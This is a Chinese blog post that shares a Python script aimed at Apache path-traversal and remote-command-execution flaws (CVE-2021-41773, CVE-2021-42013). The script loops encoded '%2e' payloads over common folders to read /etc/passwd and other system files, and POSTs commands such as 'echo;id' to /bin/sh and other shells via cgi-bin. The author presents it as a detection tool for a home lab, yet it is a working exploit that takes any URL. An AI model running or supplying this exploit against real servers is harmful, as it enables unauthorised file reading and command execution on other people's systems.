自己在家写的简单的脚本检测,没有多么炫酷,代码的备注都给你们写的好好的,给小女点个赞再走咯。为啥使用urllib不要request模块是因为在写的时候发现request模块会将url进行转码。所以使用比较老的urllib模块。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: trance
# datetime: 2021/12/2 0002 22:29
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: trance
# datetime: 2021/10/18 0018 21:15
from urllib import request
from urllib.request import ProxyHandler, build_opener
import sys
#检测目录穿越
def directoryTraversalTest(url, headers1, opener):
for readfile in payloadFile:
for url1 in ulist:
for folder in folderlist:
allurls = url + folder + url1 + readfile
#对于url进行遍历整合,
try:
req0 = request.Request(allurls, headers=headers1, method='GET')
#构造请求头
req0 = opener.open(req0)
#走代理
# req1 = request.urlopen(req0)
code = req0.getcode()
#拿到响应码
if code == 200:
print(req0.read())
#读取响应内容
print(allurls + ' 该url攻击成功,存在目录穿越漏洞')
except Exception as e:
#遇到异常,打印异常情况
# print(e)
print('请求异常:'+str(e))
continue
#检测任意命令执行
def exploitShell(url, mkdir, opener, shellPostDataList, headers1):
num = int(input('输入0-1选择执行的命令 0:echo;id 1:echo Content-Type: text/plain; echo; id'))
for url1 in ulist:
for shell in shellFile:
fullurl=url + mkdir + url1 + shell
#对于url进行遍历整合
print(fullurl)
try:
req0 = request.Request(fullurl, headers=headers1,data=shellPostDataList[num].encode())
#构造请求头,post数据需要编码才能识别
req0 = opener.open(req0)
#走代理
code = req0.getcode()
#获得响应码
if code == 200:
#打印响应体
print(req0.read())
print(fullurl + ' 该url攻击成功,存在任意命令执行')
except Exception as e:
#print(e)
print('请求异常:'+str(e))
# 遇到异常,打印异常情况
continue
if __name__ == '__main__':
folderlist = ['/icons', '/cgi-bin', '/assets', '/uploads', '/img', '/image']
# folderlist = ['/icons']
# 可选穿越的文件夹列表
ulist = []
# cve-2021-41773
ulist.append("/.%2e/%2e%2e/%2e%2e/%2e%2e")
ulist.append("/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e")
# cve-2021-42013
ulist.append("/.%%32%65/.%%32%65/.%%32%65/.%%32%65")
ulist.append("/.%%32e/.%%32e/.%%32e/.%%32e")
ulist.append("/.%2%65/.%2%65/.%2%65/.%2%65")
ulist.append("/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65")
#读取的文件部分集合,该文件是我自己尝试可以读取的,可能还有其他文件。
payloadFile = ["/etc/adduser.conf",
"/etc/passwd",
"/etc/host.conf",
"/etc/group",
"/etc/issue",
"/etc/mtab",
"/etc/shells",
"/etc/fstab",
"/etc/hostname"]
#输入的命令,可以写别的
shellPostDataList = ["echo;id", "echo Content-Type: text/plain; echo; id"]
shellFile = ["/bin/sh", "/bin/bash", "/bin/rbash", "/bin/dash"]
#请求头
headers1 = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36",
'Content-Type': 'application/x-www-form-urlencoded'
}
#走的代理
proxy_handler = ProxyHandler({
'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
})
opener = build_opener(proxy_handler)
url = sys.argv[1]
#url = "http://192.168.78.130:8080"我自己用docker搭建的靶场
#对于检测内容进行分情况处理。
while True:
numbers = int(input('输入对于数字 1:检测是否存在目录穿越,2:检测是否存在任意命令执行,3退出检测程序'))
if numbers == 1:
directoryTraversalTest(url, headers1, opener)
elif numbers == 2:
mkdir = '/cgi-bin'
exploitShell(url, mkdir, opener, shellPostDataList, headers1)
elif numbers == 3:
break
else:
print('您输入的有误请重新输入')
#注意:cve-2021-41773,cve-2021-42013 两种的url不一样,命令执行需要在服务端开启了cgi或cgid这两个mod的情况下才可以
#其他目录穿越,需要看apache是否给与权限。
使用方法:
打开cmd 输入命令 不要照抄哦,python+空格+代码路径+空格+检测url 按回车,输入账号和密码,按回车ok了
靶场搭建可以看看:CVE-2021-41773漏洞复现_dreamthe的博客-CSDN博客